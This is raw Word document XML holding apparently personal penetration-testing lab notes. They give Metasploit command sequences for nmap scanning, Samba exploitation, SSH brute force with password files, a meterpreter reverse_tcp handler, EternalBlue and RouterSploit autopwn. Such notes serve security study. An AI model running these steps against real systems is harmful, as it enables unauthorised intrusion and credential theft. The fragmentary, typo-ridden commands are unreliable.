          <w:p w14:paraId="4EC7A303" w14:textId="2763FA5B" w:rsidR="008F47F2" w:rsidRDefault="008F47F2" w:rsidP="008F47F2">
            <w:r>
              <w:lastRenderedPageBreak/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t xml:space="preserve">CL: show </w:t>
            </w:r>
            <w:r w:rsidR="00956DEC">
              <w:t>paypload</w:t>
            </w:r>
            <w:r w:rsidR="00B10F4D">
              <w:t>s</w:t>
            </w:r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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3999C651" w14:textId="77777777" w:rsidR="002522F5" w:rsidRDefault="002522F5" w:rsidP="009F7C90"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="238D6B8A" w14:textId="77777777" w:rsidR="002522F5" w:rsidRDefault="002522F5" w:rsidP="0059475F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="265101CB" w14:textId="77777777" w:rsidR="0059475F" w:rsidRDefault="0059475F" w:rsidP="0059475F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059475F" w14:paraId="428F02A9" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3551687B" w14:textId="612DD3AF" w:rsidR="00AF1B41" w:rsidRDefault="00AF1B41" w:rsidP="0059475F">
            <w:r>
              <w:t>CL: sudo nmap -sV {ipaddress}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30818845" w14:textId="77777777" w:rsidR="0059475F" w:rsidRDefault="00AF1B41" w:rsidP="0059475F">
            <w:r>
              <w:t>CL: searchsploit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>ch {</w:t>
            </w:r>
            <w:r w:rsidR="00995DF6">
              <w:t xml:space="preserve"> version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exploit/unix/-&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38EFFB4F" w14:textId="0F4279B8" w:rsidR="00C05080" w:rsidRDefault="00C05080" w:rsidP="00C05080">
            <w:r>
              <w:t>CL: show payploads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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A0F5A4E" w14:textId="77777777" w:rsidR="0059475F" w:rsidRDefault="005E4457" w:rsidP="0059475F">
            <w:r w:rsidRPr="005E4457">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Netcat – allow connection to UDP and TCP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1010C93E" w14:textId="77777777" w:rsidR="001405CD" w:rsidRDefault="001405CD" w:rsidP="0059475F"/>
          <w:p w14:paraId="3BE4261D" w14:textId="77777777" w:rsidR="005E4457" w:rsidRDefault="001405CD" w:rsidP="0059475F">
            <w:r>
              <w:t>CL: nc -help</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E43D10E" w14:textId="77777777" w:rsidR="008C2727" w:rsidRDefault="008C2727" w:rsidP="0059475F"/>
          <w:p w14:paraId="3FE2C8AF" w14:textId="77777777" w:rsidR="008C2727" w:rsidRDefault="008C2727" w:rsidP="0059475F"/>
          <w:p w14:paraId="7A39BC76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Telnet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13FFE15F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Searchsploit Linux tetnetd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A75BF9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 Linux telnetd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7243178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telnet {ipaddress}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38878891" w14:textId="48ECCF8A" w:rsidR="00D7799A" w:rsidRDefault="00D7799A" w:rsidP="0059475F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059475F" w14:paraId="53ABD947" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27190793" w14:textId="76F21438" w:rsidR="00A47ED9" w:rsidRPr="00A47ED9" w:rsidRDefault="00A47ED9" w:rsidP="0059475F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A47ED9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SMB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="555B0B92" w14:textId="493C3DBB" w:rsidR="00D7799A" w:rsidRDefault="00C72950" w:rsidP="0059475F">
            <w:r>
              <w:t>CL: searchsploit samba</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4442DECD" w14:textId="1843B767" w:rsidR="00C72950" w:rsidRDefault="00C72950" w:rsidP="00C72950">
            <w:r>
              <w:t>CL: searchs samba</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78DF98B8" w14:textId="25FE463C" w:rsidR="00A14902" w:rsidRDefault="00A14902" w:rsidP="00C72950">
            <w:r>
              <w:t>CL: use auxiliary/scanner/smb/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="723A174B" w14:textId="58AED166" w:rsidR="00032FF6" w:rsidRDefault="00F17F9E" w:rsidP="00F17F9E">
            <w:r>
              <w:t>FIND THE VERSION</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4780064D" w14:textId="45A41D75" w:rsidR="00032FF6" w:rsidRDefault="00032FF6" w:rsidP="00F17F9E">
            <w:r>
              <w:t>CL: use auxiliary/scanner/smb/smb_version</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="440ADE75" w14:textId="098027C7" w:rsidR="00032FF6" w:rsidRDefault="00032FF6" w:rsidP="00F17F9E">
            <w:r>
              <w:t>CL: use auxiliary/scanner/smb/{VERSION}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A36F406" w14:textId="7F2A97FB" w:rsidR="00A47ED9" w:rsidRPr="000C5654" w:rsidRDefault="00A47ED9" w:rsidP="00A47ED9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C5654">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">CL: show </w:t>
            </w:r>
            <w:r w:rsidR="008B78F0" w:rsidRPr="000C5654">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>info</w:t>
            </w:r>
            <w:r w:rsidRPr="000C5654">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> or show options</w:t>
            </w:r>
            <w:r w:rsidR="005A59F4" w:rsidRPr="000C5654">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> or show payloads</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045D2CB7" w14:textId="1864EF79" w:rsidR="00160FE0" w:rsidRDefault="00160FE0" w:rsidP="00160FE0">
            <w:r>
              <w:t>CL: set RHOSTS {IPADDRESS}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7343A5A8" w14:textId="0B5FEE4F" w:rsidR="00160FE0" w:rsidRDefault="00160FE0" w:rsidP="00160FE0">
            <w:r>
              <w:t>CL: run</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14584AB6" w14:textId="459BB0DF" w:rsidR="00A47ED9" w:rsidRDefault="00032FF6" w:rsidP="00F17F9E">
            <w:r>
              <w:t>GET VERSION</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74E105F1" w14:textId="74412CFE" w:rsidR="00032FF6" w:rsidRDefault="00032FF6" w:rsidP="00F17F9E">
            <w:r>
              <w:t>REPEAT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="402D6D48" w14:textId="61B7AFA1" w:rsidR="00032FF6" w:rsidRDefault="00032FF6" w:rsidP="00F17F9E">
            <w:r>
              <w:t>CL: searchsploit Samba 3.0.20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EDF9081" w14:textId="3A67381F" w:rsidR="00032FF6" w:rsidRDefault="00032FF6" w:rsidP="00032FF6">
            <w:r>
              <w:t>CL: user {PATHNAME}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08F51B33" w14:textId="4AD3FE93" w:rsidR="00F17F9E" w:rsidRDefault="00F17F9E" w:rsidP="00C72950"/>
          <w:p w14:paraId="41DA32B5" w14:textId="3D0395E4" w:rsidR="0046493F" w:rsidRDefault="0046493F" w:rsidP="00C72950">
            <w:r>
              <w:t>CL: show payloads</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68EF00B2" w14:textId="6D4588C1" w:rsidR="0046493F" w:rsidRDefault="0046493F" w:rsidP="0046493F">
            <w:r>
              <w:t xml:space="preserve">CL: set payload {PAYLOAD-NAME} </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F9C5059" w14:textId="77777777" w:rsidR="00E43DF7" w:rsidRDefault="00E43DF7" w:rsidP="0046493F"/>
          <w:p w14:paraId="38970AB9" w14:textId="20DFC20F" w:rsidR="00AF3E1D" w:rsidRDefault="00AF3E1D" w:rsidP="0059475F"/>
          <w:p w14:paraId="432476D1" w14:textId="77777777" w:rsidR="0046493F" w:rsidRDefault="0046493F" w:rsidP="0059475F"/>
          <w:p w14:paraId="479BEF94" w14:textId="77777777" w:rsidR="00C72950" w:rsidRDefault="00C72950" w:rsidP="0059475F"/>
          <w:p w14:paraId="65887FAD" w14:textId="77777777" w:rsidR="00AF3E1D" w:rsidRDefault="00AF3E1D" w:rsidP="0059475F"/>
          <w:p w14:paraId="377CFACE" w14:textId="158334AD" w:rsidR="00AF3E1D" w:rsidRDefault="00AF3E1D" w:rsidP="0059475F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76DC6137" w14:textId="23E69DCC" w:rsidR="0059475F" w:rsidRDefault="00770A0C" w:rsidP="0059475F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770A0C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>BRUTEFORCE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0068710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attack</w:t>
            </w:r>
            <w:r w:rsidR="00856627">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> SSH</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67D972E5" w14:textId="77777777" w:rsidR="0068710E" w:rsidRDefault="00856627" w:rsidP="0059475F">
            <w:r>
              <w:t>CL: search SSH</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6327305C" w14:textId="77777777" w:rsidR="00856627" w:rsidRDefault="00856627" w:rsidP="0059475F">
            <w:r>
              <w:t>CL: use auxiliary/scanner/ssh/ssh_login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="630065E8" w14:textId="77777777" w:rsidR="00856627" w:rsidRDefault="00856627" w:rsidP="0059475F">
            <w:r>
              <w:t>CL: show info</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF1874A" w14:textId="77777777" w:rsidR="00A26B1C" w:rsidRDefault="00A26B1C" w:rsidP="0059475F"/>
          <w:p w14:paraId="401CCC48" w14:textId="6524DA24" w:rsidR="00A26B1C" w:rsidRDefault="00E850B5" w:rsidP="0059475F">
            <w:r>
              <w:t xml:space="preserve">CL: set </w:t>
            </w:r>
            <w:r w:rsidR="00A26B1C">
              <w:t>PASS_FILE</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> {filepath}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D936CB" w14:textId="567A82B8" w:rsidR="00A26B1C" w:rsidRDefault="00E850B5" w:rsidP="0059475F">
            <w:r>
              <w:t xml:space="preserve">CL: </w:t>
            </w:r>
            <w:r w:rsidR="00A26B1C">
              <w:t>USER_FILE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05E82646" w14:textId="1F84D15A" w:rsidR="00A26B1C" w:rsidRDefault="00E850B5" w:rsidP="0059475F">
            <w:r>
              <w:t xml:space="preserve">CL: </w:t>
            </w:r>
            <w:r w:rsidR="00A26B1C">
              <w:t>SET RHOST</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36F6D79A" w14:textId="77777777" w:rsidR="00A26B1C" w:rsidRDefault="00A26B1C" w:rsidP="0059475F">
            <w:r>
              <w:t xml:space="preserve"> CL: run</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15FC0638" w14:textId="77777777" w:rsidR="00A26B1C" w:rsidRDefault="00A26B1C" w:rsidP="0059475F"/>
          <w:p w14:paraId="54C9D9D5" w14:textId="5F4D13E5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>CL: s</w:t>
            </w:r>
            <w:r w:rsidRPr="00A26B1C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>essions</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64AA3CBB" w14:textId="77777777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 xml:space="preserve">CL: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A26B1C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>sessions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C918116" w14:textId="77777777" w:rsidR="00A26B1C" w:rsidRDefault="00A26B1C" w:rsidP="0059475F">
            <w:r>
              <w:t>FROM DESKTOP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50AE8EDF" w14:textId="4A67F7B0" w:rsidR="00A26B1C" w:rsidRPr="00856627" w:rsidRDefault="00A26B1C" w:rsidP="0059475F">
            <w:r>
              <w:t>CL: ssh msfadmin@{IPADDRESS}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059475F" w14:paraId="3568A416" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FEE3D9B" w14:textId="29C1B519" w:rsidR="0059475F" w:rsidRDefault="0030731F" w:rsidP="0059475F">
            <w:r w:rsidRPr="007F2764">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Use exploit/multi/handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41BE1CEE" w14:textId="310B49FF" w:rsidR="0059475F" w:rsidRDefault="0030731F" w:rsidP="0059475F">
            <w:r>
              <w:t>CL: set payload windows/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F2764" w14:paraId="78F91E89" w14:textId="77777777" w:rsidTr="001A1634">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="0972176B" w14:textId="1A0AC203" w:rsidR="007F2764" w:rsidRPr="007F2764" w:rsidRDefault="007F2764" w:rsidP="0059475F">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059475F" w14:paraId="6D8BA5E5" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74470B8B" w14:textId="77777777" w:rsidR="0059475F" w:rsidRDefault="0059475F" w:rsidP="0059475F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6492C490" w14:textId="77777777" w:rsidR="0059475F" w:rsidRDefault="0059475F" w:rsidP="0059475F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059475F" w14:paraId="10543514" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EABA3AE" w14:textId="77777777" w:rsidR="0059475F" w:rsidRDefault="0059475F" w:rsidP="0059475F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19B3586E" w14:textId="77777777" w:rsidR="0059475F" w:rsidRDefault="0059475F" w:rsidP="0059475F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00945663" w14:paraId="3A3605B6" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="010BBBF3" w14:textId="064E49FD" w:rsidR="00945663" w:rsidRDefault="00945663" w:rsidP="002F2347">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF3F62">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Eternal Blue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059475F" w14:paraId="0200DD81" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B2CF918" w14:textId="77777777" w:rsidR="0059475F" w:rsidRDefault="006F6E7F" w:rsidP="0059475F">
            <w:r>
              <w:t>CL: search eternalblue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DF79C87" w14:textId="54ACFB2E" w:rsidR="006F6E7F" w:rsidRDefault="006F6E7F" w:rsidP="0059475F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F3C93D9" w14:textId="49829B0D" w:rsidR="0059475F" w:rsidRDefault="0059475F" w:rsidP="0059475F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B2773E" w14:paraId="72849F54" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="008B13D6" w14:textId="6E681042" w:rsidR="00B2773E" w:rsidRDefault="00B2773E" w:rsidP="00B2773E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>DoublePulsar</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3F62">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> Blue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B2773E" w14:paraId="6DEBD02A" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC40FA3" w14:textId="58CBA607" w:rsidR="00B2773E" w:rsidRDefault="005341B8" w:rsidP="00B2773E">
            <w:r>
              <w:t>Need to install</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17AD452B" w14:textId="4BE8C32C" w:rsidR="00B16D4D" w:rsidRDefault="00B16D4D" w:rsidP="00B2773E">
            <w:r>
              <w:t>Sudo su</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58EF5CC2" w14:textId="119D40CD" w:rsidR="00B16D4D" w:rsidRDefault="00B16D4D" w:rsidP="00B2773E">
            <w:r>
              <w:t>Sudo dpkg –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15ED21E8" w14:textId="3898CCA3" w:rsidR="00B16D4D" w:rsidRDefault="00B16D4D" w:rsidP="00B2773E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="453A701D" w14:textId="77777777" w:rsidR="00B2773E" w:rsidRDefault="00B2773E" w:rsidP="00B2773E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A09E9" w14:paraId="6275D5D1" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6596BA4C" w14:textId="62480BE7" w:rsidR="009A09E9" w:rsidRPr="00141370" w:rsidRDefault="009A09E9" w:rsidP="009A09E9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00141370">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>BlueKeep -RDP Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B2773E" w14:paraId="45E3AD84" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44ABC215" w14:textId="77777777" w:rsidR="00B2773E" w:rsidRDefault="00B2773E" w:rsidP="00B2773E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C4172F4" w14:textId="77777777" w:rsidR="00B2773E" w:rsidRDefault="00B2773E" w:rsidP="00B2773E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00141370" w14:paraId="0220EC90" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1035FC68" w14:textId="0074FA94" w:rsidR="00141370" w:rsidRDefault="00141370" w:rsidP="00141370">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00141370">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Routersploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00141370" w14:paraId="2E093CFE" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="060FFA7D" w14:textId="5253E8EC" w:rsidR="00141370" w:rsidRDefault="00141370" w:rsidP="00B2773E">
            <w:r w:rsidRPr="00141370">
              <w:t>https://github.com/threat9/routersploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B2773E" w14:paraId="50182405" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="715C302E" w14:textId="33684262" w:rsidR="00B2773E" w:rsidRDefault="00A66260" w:rsidP="00A66260">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Follow the instructions in github</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C777C1" w14:textId="77777777" w:rsidR="00292A7B" w:rsidRDefault="00292A7B" w:rsidP="00292A7B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BD662A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apt-get install python3-pip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A93A4EB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git clone https://www.github.com/threat9/routersploit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D2AACB4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cd routersploit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29304D5C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python3 -m pip install -r requirements.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D147F5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rsf.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AA58D7D" w14:textId="776B7B0A" w:rsidR="00292A7B" w:rsidRDefault="00292A7B" w:rsidP="00292A7B"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F9DD9D" w14:textId="500EA5EB" w:rsidR="00B2773E" w:rsidRDefault="00DA02EF" w:rsidP="00B2773E">
            <w:r>
              <w:t>CL: help</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CFFF71F" w14:textId="5F9F72D0" w:rsidR="00936C41" w:rsidRDefault="00936C41" w:rsidP="00B2773E">
            <w:r>
              <w:t>CL: search scanners</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03047BD8" w14:textId="68BC3F44" w:rsidR="001649B0" w:rsidRDefault="001649B0" w:rsidP="00B2773E">
            <w:r>
              <w:t>CL: use scanners/autopwn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18D40333" w14:textId="3F026716" w:rsidR="001649B0" w:rsidRDefault="001649B0" w:rsidP="00B2773E">
            <w:r>
              <w:t>CL: show info</w:t>
            </w:r>
            <w:r w:rsidR="003035A2">
              <w:t xml:space="preserve"> or show options</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A398E0F" w14:textId="66889FCC" w:rsidR="00C9782C" w:rsidRDefault="00C9782C" w:rsidP="00B2773E">
            <w:r>
              <w:t>CL: set target {IPADDRESS}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="226735B2" w14:textId="5287A6C9" w:rsidR="00C9782C" w:rsidRDefault="00C9782C" w:rsidP="00B2773E">
            <w:r>
              <w:t>CL: run</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75FA9637" w14:textId="77777777" w:rsidR="00DA02EF" w:rsidRDefault="00DA02EF" w:rsidP="00B2773E"/>
          <w:p w14:paraId="21AEB497" w14:textId="77777777" w:rsidR="00DA02EF" w:rsidRDefault="00DA02EF" w:rsidP="00B2773E"/>
          <w:p w14:paraId="70C96BC7" w14:textId="77777777" w:rsidR="00DA02EF" w:rsidRDefault="00DA02EF" w:rsidP="00B2773E"/>
          <w:p w14:paraId="6A91173B" w14:textId="77777777" w:rsidR="00DA02EF" w:rsidRDefault="00DA02EF" w:rsidP="00B2773E"/>
          <w:p w14:paraId="6C31DDD5" w14:textId="7A38A7FA" w:rsidR="00DA02EF" w:rsidRDefault="00DA02EF" w:rsidP="00B2773E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B2773E" w14:paraId="69A1FB5C" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2635417B" w14:textId="77777777" w:rsidR="00B2773E" w:rsidRDefault="00B2773E" w:rsidP="00B2773E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="641DE333" w14:textId="77777777" w:rsidR="00B2773E" w:rsidRDefault="00B2773E" w:rsidP="00B2773E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B2773E" w14:paraId="5C560D8B" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A5B86A9" w14:textId="77777777" w:rsidR="00B2773E" w:rsidRDefault="00B2773E" w:rsidP="00B2773E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4449BFF6" w14:textId="77777777" w:rsidR="00B2773E" w:rsidRDefault="00B2773E" w:rsidP="00B2773E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B2773E" w14:paraId="0DD4F8E3" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A3345E" w14:textId="77777777" w:rsidR="00B2773E" w:rsidRDefault="00B2773E" w:rsidP="00B2773E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="201CD99C" w14:textId="77777777" w:rsidR="00B2773E" w:rsidRDefault="00B2773E" w:rsidP="00B2773E"/>
        </w:tc>
      </w:tr>
    </w:tbl>
